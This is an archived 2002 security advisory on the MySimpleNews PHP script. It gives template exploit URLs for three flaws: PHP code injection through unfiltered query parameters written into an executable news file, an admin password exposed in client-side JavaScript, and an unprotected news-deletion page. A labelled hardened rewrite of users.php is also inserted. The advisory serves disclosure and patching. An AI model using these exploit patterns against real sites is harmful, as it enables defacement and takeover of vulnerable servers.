MySimpleNews (PHP)

From: Frog Man (leseulfrogat_private)
Date: Wed Oct 02 2002 - 13:17:53 PDT


    Information :
    °°°°°°°°°°°°°°
    Language : PHP
    Tested version : 1
    Website : ?
    Comment : Very simple code.
    
    
    a) Writing PHP code in a PHP file and execution of this code.
    Problem :
    °°°°°°°°°
    ----------------- users.php -----------------
    <?
    $fp=fopen("news.php3","a");
    fwrite($fp,"Posté Par [$LOGIN]\n");
    fwrite($fp,"Le $DATA\n<br>");
    fwrite($fp,"$MESS\n<hr>");
    fclose($fp);
    ?>
    ----------------- users.php -----------------
    
    Exploit :
    °°°°°°°°°
    http://[target]/users.php?LOGIN=[PHP code]
    or
    http://[target]/users.php?DATA=[PHP code]
    or
    http://[target]/users.php?MESS=[PHP code]
    Execution : http://[target]/news.php3
    
    
    b) Recovery of the admin's password.
    Problem :
    °°°°°°°°°
    ------------------ admin.html ------------------
    moncode = prompt('MySimpleNews - Administration','');
    if (moncode != "[PASSWORD]")
        {
        location.href="about:Erreur 403";
        }
    ------------------ admin.html ------------------
    
    Exploit :
    °°°°°°°°°
    view-source:http://[target]/admin.html
    
    c) Deleting news.
    Problem :
    °°°°°°°°°
    No access control in the file.
    
    Exploit :
    °°°°°°°°°
    http://[target]/vider.php3
    
    
    Patch :
    °°°°°°°
    Use of htaccess.
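    A hardened rewrite of users.php, added here as an example and not the project's or the author's code, showing the fix for issue (a) next to the htaccess-based patch: fields are read explicitly instead of relying on register_globals (which is what let $LOGIN, $DATA and $MESS be set from the query string), escaped before storage, and appended to a data file the server never executes. The file name news.txt, the POST field names and the REMOTE_USER check are assumptions.

```php
<?php
// Hardened rewrite of users.php (added example, not MySimpleNews code).
// Assumptions: posts come from a form via POST, the news store is news.txt,
// and the directory is protected by the HTTP Basic auth .htaccess from the patch.

// Refuse to run unless the web server authenticated the admin (sets REMOTE_USER).
// This replaces the client-side JavaScript prompt check of admin.html.
if (empty($_SERVER['REMOTE_USER'])) {
    header('HTTP/1.0 403 Forbidden');
    exit('Forbidden');
}

// Take fields explicitly from the POST body instead of trusting the globals
// $LOGIN / $DATA / $MESS that register_globals populated from the URL.
$login = isset($_POST['LOGIN']) ? (string) $_POST['LOGIN'] : '';
$date  = isset($_POST['DATA'])  ? (string) $_POST['DATA']  : '';
$mess  = isset($_POST['MESS'])  ? (string) $_POST['MESS']  : '';

// Bound the sizes and HTML-escape everything that will be displayed.
// Escaping turns "<?" into "&lt;?", so nothing stored can be parsed as PHP
// or injected as markup when the news page is rendered.
$login = htmlspecialchars(substr($login, 0, 64), ENT_QUOTES);
$date  = htmlspecialchars(substr($date, 0, 32), ENT_QUOTES);
$mess  = htmlspecialchars(substr($mess, 0, 4000), ENT_QUOTES);

if ($login === '' || $mess === '') {
    header('HTTP/1.0 400 Bad Request');
    exit('Missing LOGIN or MESS');
}

// Append to a plain data file, never to a .php/.php3 file that the server
// would execute. Block direct download of it in .htaccess:
//   <Files "news.txt">
//       Deny from all
//   </Files>
// and have the viewer script read it and echo it inside the page.
$fp = fopen('news.txt', 'a');
if ($fp === false) {
    exit('Cannot open news store');
}
flock($fp, LOCK_EX);           // serialise concurrent posts
fwrite($fp, "Posté Par [$login]\n");
fwrite($fp, "Le $date\n<br>");
fwrite($fp, "$mess\n<hr>");
flock($fp, LOCK_UN);
fclose($fp);
?>
```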
    
    More details in French :
    http://www.frog-man.org/tutos/MySimpleNews.txt
    
    
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMySimpleNews.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
    
    
    frog-m@n
    
    
    



    This archive was generated by hypermail 2b30 : Wed Oct 02 2002 - 15:30:36 PDT